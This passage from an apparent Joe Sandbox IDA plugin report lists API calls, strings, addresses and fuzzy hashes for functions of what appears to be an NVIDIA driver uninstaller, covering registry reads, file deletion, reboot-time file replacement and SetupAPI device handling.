                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Similarity
                                  • API ID: File$Global$InfoVersion$AllocAttributesCopyLockSizeTime_fputs$DebugDirectoryFormatFreeLocalModuleMutexNameObjectOutputQueryReleaseSingleStringSystemUnlockValueWait_fprintf_sprintf
                                  • String ID: %s\system32\nvuninst.exe$DUMMY_INSTANCEID$DevInstanceID$Error updating file$File [%s] is up-to-date$LeaveDriverStoreCache$Set Current Reg Key$Set Current Reg Name$Set Current Reg Value$Set Current Root Key$Set Enum Last Reg Key$Uninstaller [%s] version %d.%d.%d.%d running$Updating old file [%s]$sysdir$windir
                                  • API String ID: 1418329812-2938187850
                                  • Opcode ID: e661dd150dd4afbcde81a19fcf387fd0949fe409307c19d94f04ad3511b5b95f
                                  • Instruction ID: 853348aadae27bff7ff6b9a27ebd8f4a70b8e9ed6c7c73fcbe45c83cca92c257
                                  • Opcode Fuzzy Hash: e661dd150dd4afbcde81a19fcf387fd0949fe409307c19d94f04ad3511b5b95f
                                  • Instruction Fuzzy Hash: 2451587170030467C714AB719C63FAB37859B99748F54093EF946B72C3EA7DA90883AD
                                  Strings
                                  • GetRegistry: cannot find '\', xrefs: 00405F65
                                  • Clearing variable %s., xrefs: 00406081
                                  • Failed to open KeyPath %s., xrefs: 00405FA9
                                  • Failed to open BaseKey., xrefs: 00405F35
                                  • Failed to query Value %s., xrefs: 00406028
                                  • Handle failed or failed to query Value %s., xrefs: 004060CE
                                  • GetRegistry: invalid number of arguments, xrefs: 00405EFC
                                  • UninstCommandClass::GetRegistry(%s), xrefs: 00405EDA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: Clearing variable %s.$Failed to open BaseKey.$Failed to open KeyPath %s.$Failed to query Value %s.$GetRegistry: cannot find '\'$GetRegistry: invalid number of arguments$Handle failed or failed to query Value %s.$UninstCommandClass::GetRegistry(%s)
                                  • API String ID: 4132451974-2754830086
                                  • Opcode ID: 2e6ad7e279f25026bc119b6dbaae34d94337c9c78bae42e7b3f88a97de52f63f
                                  • Instruction ID: 2645a307ba977772fdbfed0052e8f7cdcb873b7eef51b05e98ff4a9dca2aa226
                                  • Opcode Fuzzy Hash: 2e6ad7e279f25026bc119b6dbaae34d94337c9c78bae42e7b3f88a97de52f63f
                                  • Instruction Fuzzy Hash: A6511FB2B443106BD310EB75AC41EAB7B9CEF94314F04093BF945A3281F679E914C6EA
                                  APIs
                                  • _strcpy_s.LIBCMT ref: 00413907
                                  • __invoke_watson.LIBCMT ref: 00413918
                                  • GetModuleFileNameA.KERNEL32(00000000,0042B2D9,00000104,0040B4E2,?), ref: 00413934
                                  • _strcpy_s.LIBCMT ref: 00413949
                                  • __invoke_watson.LIBCMT ref: 0041395C
                                  • _strlen.LIBCMT ref: 00413965
                                  • _strlen.LIBCMT ref: 00413972
                                  • __invoke_watson.LIBCMT ref: 0041399F
                                  • _strcat_s.LIBCMT ref: 004139B2
                                  • __invoke_watson.LIBCMT ref: 004139C3
                                  • _strcat_s.LIBCMT ref: 004139D4
                                  • __invoke_watson.LIBCMT ref: 004139E5
                                  • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77435E70,00000003,00413A67,000000FC,0040FE4C,00000001,00000000,00000000,?,00411A6B,0040B4E2,00000001), ref: 00413A04
                                  • _strlen.LIBCMT ref: 00413A25
                                  • WriteFile.KERNEL32(00000000,00000000,00000000,0040B462,00000000,?,00411A6B,0040B4E2,00000001,?,004119B7,00000018,004233A8,0000000C,00411A46,?), ref: 00413A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Similarity
                                  • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                  • API String ID: 1879448924-4022980321
                                  • Opcode ID: 90722357092192b5ab65a9da1887331e2cc34f6ae0c878e98eb3b611f3a5f837
                                  • Instruction ID: 728515e27f9d96cd5a8af33a122b176d61e118c7b566c5b050aee71ac3ea5e33
                                  • Opcode Fuzzy Hash: 90722357092192b5ab65a9da1887331e2cc34f6ae0c878e98eb3b611f3a5f837
                                  • Instruction Fuzzy Hash: 82316EF2A402153AE5207A365D06FBB324C9F113A9F450137FD45A12D2FB6D9A8681FE
                                  APIs
                                  • PathIsDirectoryA.SHLWAPI(?), ref: 004048D3
                                  • PathIsDirectoryA.SHLWAPI(?), ref: 004048EE
                                  • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00404913
                                  • __time32.LIBCMT ref: 0040491B
                                  • _rand.LIBCMT ref: 00404926
                                  • _swprintf.LIBCMT ref: 0040493C
                                  • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00404962
                                  • GetLastError.KERNEL32 ref: 00404978
                                  • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040499F
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: File$DirectoryMovePathTime_fputs$AttributesDebugErrorFormatLastLocalMutexObjectOutputReleaseSingleStringWait__time32_fprintf_rand_swprintf
                                  • String ID: %s-nv%d$Failed$NULL$Renaming %s to %s$Succeeded$UninstCommandClass::NvReplaceFileOnReboot - %s$UninstCommandClass::NvReplaceFileOnReboot - File does not exist$UninstCommandClass::NvReplaceFileOnReboot - Invaid path parameter instead of file$UninstCommandClass::NvReplaceFileOnReboot - Rename of %s %s (error:%d)$UninstCommandClass::NvReplaceFileOnReboot(%s,%s)
                                  • API String ID: 3498336020-3514494225
                                  • Opcode ID: d9d5937ad11d0a00826c1716c76499b846d8f831eeed15d4e8d659da41821490
                                  • Instruction ID: 6295671737825a11f12bde8a9546047efc38c4797ded0eb247e85bb343121b86
                                  • Opcode Fuzzy Hash: d9d5937ad11d0a00826c1716c76499b846d8f831eeed15d4e8d659da41821490
                                  • Instruction Fuzzy Hash: 90310AF6A403107BD210B7659C42FEB3A4C9F9A358F04453BFA44A32C1E67C994586EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: <$Current Parser Path$Driver install %s a reboot$Failed when we called UpdateDriverForPlugAndPlayDevices$InstallDriver: invalid number of arguments$SysCallAndWait %s\%s %ld %s %s$UninstCommandClass::InstallDriver$Win95$Win98$doesn't require$nvupnp-amd64.exe$nvupnp-ia64.exe$requires
                                  • API String ID: 4132451974-842954344
                                  • Opcode ID: 0a3140c997d938c55d3a8dcc526be492d4007ce3206d898fcea2c7d7eae49abe
                                  • Instruction ID: 42460058576d8b77fc55ddd8d981fed2b7b9867c0d2816596afe44e5bd57d26b
                                  • Opcode Fuzzy Hash: 0a3140c997d938c55d3a8dcc526be492d4007ce3206d898fcea2c7d7eae49abe
                                  • Instruction Fuzzy Hash: 3351D670604741ABD724EA658C06FBB76D8AB94709F00083FF549E62C3DB7C9D4987AE
                                  APIs
                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0040E1D0), ref: 0040F0D3
                                  • __mtterm.LIBCMT ref: 0040F0DF
                                    • Part of subcall function 0040EE21: TlsFree.KERNEL32(00000012,0040F24C), ref: 0040EE4C
                                    • Part of subcall function 0040EE21: DeleteCriticalSection.KERNEL32(00000000,00000000,7556DFB0,00000001,0040F24C), ref: 0041191B
                                    • Part of subcall function 0040EE21: DeleteCriticalSection.KERNEL32(00000012,7556DFB0,00000001,0040F24C), ref: 00411945
                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040F0F5
                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040F102
                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040F10F
                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040F11C
                                  • TlsAlloc.KERNEL32 ref: 0040F16C
                                  • TlsSetValue.KERNEL32(00000000), ref: 0040F187
                                  • __init_pointers.LIBCMT ref: 0040F191
                                  • __calloc_crt.LIBCMT ref: 0040F206
                                  • GetCurrentThreadId.KERNEL32 ref: 0040F236
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                  • API String ID: 2125014093-3819984048
                                  • Opcode ID: c6933f4373af68cde0690791b5f333da47ece339dd8c8f53ed1e631e6ddfe54f
                                  • Instruction ID: 8a8bda549739b6fb46912d7fa0b1f0d9274e4200d8d5a19a325c21dce875d23a
                                  • Opcode Fuzzy Hash: c6933f4373af68cde0690791b5f333da47ece339dd8c8f53ed1e631e6ddfe54f
                                  • Instruction Fuzzy Hash: 65319231A80311ABC7317F76AC096173AA1EB44354B96453FE810E32F0DBB998638B9D
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetFileAttributesA.KERNEL32(?), ref: 00402A2C
                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402A6C
                                  • DeleteFileA.KERNEL32(?), ref: 00402A79
                                  • GetLastError.KERNEL32 ref: 00402A89
                                  • Sleep.KERNEL32(000003E8), ref: 00402AC5
                                  • DeleteFileA.KERNEL32(?), ref: 00402AC8
                                  • GetLastError.KERNEL32 ref: 00402B04
                                  Strings
                                  • nPollTimeoutCount = %d, xrefs: 00402AA8
                                  • CommandClass::RunOnce, xrefs: 00402A13
                                  • NVU file [%s] couldn't be deleted due to Sharing Violation., xrefs: 00402A91
                                  • Deleting NVU file [%s], xrefs: 00402A59
                                  • Deletion of NVU File [%s] failed after %d seconds., xrefs: 00402AD0
                                  • We'll wait [%s] to be freed and get deleted for max. 10 secs., xrefs: 00402A9C
                                  • NVU File [%s] deleted after polling for %d seconds., xrefs: 00402AEE
                                  • Failed to delete NVU file [%s] with error [%d], xrefs: 00402B08
                                  • LeaveBinaries, xrefs: 00402A44
                                  • Leaving NVU file [%s], xrefs: 00402B1E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: File$AttributesDeleteErrorLastTime_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleSleepStringWait_fprintf
                                  • String ID: CommandClass::RunOnce$Deleting NVU file [%s]$Deletion of NVU File [%s] failed after %d seconds.$Failed to delete NVU file [%s] with error [%d]$LeaveBinaries$Leaving NVU file [%s]$NVU File [%s] deleted after polling for %d seconds.$NVU file [%s] couldn't be deleted due to Sharing Violation.$We'll wait [%s] to be freed and get deleted for max. 10 secs.$nPollTimeoutCount = %d
                                  • API String ID: 4234528627-1706409573
                                  • Opcode ID: 4a14d0bc809e176fd4c0a097a6e86a6b18c7b649eaf900e500a4875d8e93c26b
                                  • Instruction ID: c0a542e3d7c0238f7b7a203dda44ef3d1633081303fe9afb9b043d559c39436f
                                  • Opcode Fuzzy Hash: 4a14d0bc809e176fd4c0a097a6e86a6b18c7b649eaf900e500a4875d8e93c26b
                                  • Instruction Fuzzy Hash: B321B63274131466D2206AB6BD46E9F3B0DCFA636AB104137F505B11C2EA7D5D5441FE
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00408103
                                  • GetFileVersionInfoSizeA.VERSION(?,?), ref: 0040810F
                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?), ref: 0040811D
                                  • GlobalLock.KERNEL32(00000000), ref: 0040812A
                                  • GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000), ref: 00408137
                                  • VerQueryValueA.VERSION(00000000,0041CD3C,?,?,?,00000000,00000000,00000000), ref: 00408150
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040817E
                                  • GlobalFree.KERNEL32(00000000), ref: 00408185
                                  • GetFileVersionInfoSizeA.VERSION(?,?,?,?), ref: 00408197
                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?), ref: 004081A5
                                  • GlobalLock.KERNEL32(00000000), ref: 004081B2
                                  • GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000), ref: 004081BF
                                  • VerQueryValueA.VERSION(00000000,0041CD3C,?,?,?,00000000,00000000,00000000), ref: 004081D8
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00408206
                                  • GlobalFree.KERNEL32(00000000), ref: 0040820D
                                  Strings
                                  • UninstCommandClass::IsGreater, xrefs: 004080C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Global$FileInfoVersion$AllocFreeLockQuerySizeTimeUnlockValue_fputs$DebugDirectoryFormatLocalMutexObjectOutputReleaseSingleStringSystemWait_fprintf
                                  • String ID: UninstCommandClass::IsGreater
                                  • API String ID: 1794461906-226021759
                                  • Opcode ID: 39267b06595b4439bbc571028a1487db6a4c50f3e5ce7f24655965f3bfa52e4b
                                  • Instruction ID: 99336b5770b64915b0aca5243ee5e341e913464649659e78337c6ad6bd4687bc
                                  • Opcode Fuzzy Hash: 39267b06595b4439bbc571028a1487db6a4c50f3e5ce7f24655965f3bfa52e4b
                                  • Instruction Fuzzy Hash: 1A516171508341AFC310DF55D9859ABBBE8FF88740F40493EF989A6392D738D944CB9A
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiGetINFClassA.SETUPAPI ref: 0040906D
                                  • SetupDiCreateDeviceInfoList.SETUPAPI(00000000,?), ref: 0040907C
                                  • SetupDiCreateDeviceInfoA.SETUPAPI(00000000,unknown,?,00000000,?,00000001,?), ref: 004090C5
                                  • _memset.LIBCMT ref: 004090D7
                                  • _sprintf.LIBCMT ref: 004090EA
                                  • SetupDiSetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000001,?,00000050), ref: 00409104
                                  • SetupDiRegisterDeviceInfo.SETUPAPI(00000000,?,00000000,00000000,00000000,00000000), ref: 00409118
                                  • _memset.LIBCMT ref: 0040912A
                                  • SetupDiSetDeviceInstallParamsA.SETUPAPI(00000000,?,00000128), ref: 00409167
                                  • SetupDiBuildDriverInfoList.SETUPAPI(00000000,?,00000002), ref: 00409175
                                  • _memset.LIBCMT ref: 0040918A
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • UninstCommandClass::CreateDevice, xrefs: 0040900D
                                  • CreateDevice: invalid number of arguments, xrefs: 0040902F
                                  • unknown, xrefs: 004090B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$Device$Info$_memset$CreateListTime_fputs_sprintf$BuildClassDebugDriverFormatInstallLocalMutexObjectOutputParamsPropertyRegisterRegistryReleaseSingleStringWait_fprintf
                                  • String ID: CreateDevice: invalid number of arguments$UninstCommandClass::CreateDevice$unknown
                                  • API String ID: 322256318-1358285150
                                  • Opcode ID: a94018fb6d579b354e042ddc503bacd10e53d4d1b5c43911dab66da51df4e2a5
                                  • Instruction ID: bc030977ca2bf9d72af5533a418d091b41b8f714fd2c17edf9647ced41cd9f81
                                  • Opcode Fuzzy Hash: a94018fb6d579b354e042ddc503bacd10e53d4d1b5c43911dab66da51df4e2a5
                                  • Instruction Fuzzy Hash: 9E5120B1244340BFE320DB50DC4AFEF77A8EF89704F40492DF249961C1DBB465098BAA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiClassGuidsFromNameA.SETUPAPI(?,00000000,?,?), ref: 004061C5
                                  • SetupDiClassGuidsFromNameA.SETUPAPI(?,00000000,?,?), ref: 004061F4
                                  • SetupDiGetClassDevsA.SETUPAPI ref: 00406231
                                  • SetupDiEnumDeviceInfo.SETUPAPI(00000000,?,00000001), ref: 00406299
                                  • _memset.LIBCMT ref: 004062B3
                                  • SetupDiGetDeviceInstanceIdA.SETUPAPI(00000000,?,?,00000400,00000000), ref: 004062CD
                                  • SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 00406429
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$ClassDevice$FromGuidsInfoNameTime_fputs$DebugDestroyDevsEnumFormatInstanceListLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset
                                  • String ID: DUMMY_INSTANCEID$Enum device was called with NULL function$Error$Skipping RemoveDevice on device:%s$UninstCommandClass::NvEnumDevices$any
                                  • API String ID: 363311733-3188088973
                                  • Opcode ID: 2d8af07a2f569a92dcff229592d3b7983184fe2904406c3f18282a6e3682ae03
                                  • Instruction ID: a57d1feb82a64fe5c013b1d84f289ad278b752fbb9c94777bd69b5d2824c3678
                                  • Opcode Fuzzy Hash: 2d8af07a2f569a92dcff229592d3b7983184fe2904406c3f18282a6e3682ae03
                                  • Instruction Fuzzy Hash: AA91A2B19083005FD710DF29C841B6BB7E8EBC9304F05493EF986A7291E779D954CBAA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 00403B20: WaitForSingleObject.KERNEL32(?,000000FF,004025D7), ref: 00403B31
                                    • Part of subcall function 00403B20: ReleaseMutex.KERNEL32(?), ref: 00403B47
                                  • _sprintf.LIBCMT ref: 004070CE
                                  • _sprintf.LIBCMT ref: 00407128
                                  • _sprintf.LIBCMT ref: 0040716D
                                  Strings
                                  • Removing uninstall component title from registry, xrefs: 00407158
                                  • Component uninstalled, xrefs: 00407181
                                  • Executing command %s, xrefs: 00407138
                                  • RunOnce {sysdir}\%s, xrefs: 0040711B
                                  • Clearing uninstall component title from registry, xrefs: 004070F4
                                  • Getreg Uninstall Title={NVCompList_RegKey}\%s, xrefs: 004070C8
                                  • Setreg {NVCompList_RegKey}\{Current Reg Name}={UNINSTALL_TAG}, xrefs: 0040710E
                                  • Delreg {NVCompList_RegKey}\%s, xrefs: 00407167
                                  • Current Reg Name, xrefs: 00407102
                                  • Uninstalling component %s, xrefs: 004070AF
                                  • Uninstall {sysdir}\%s,{Uninstall Title}, xrefs: 004071AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
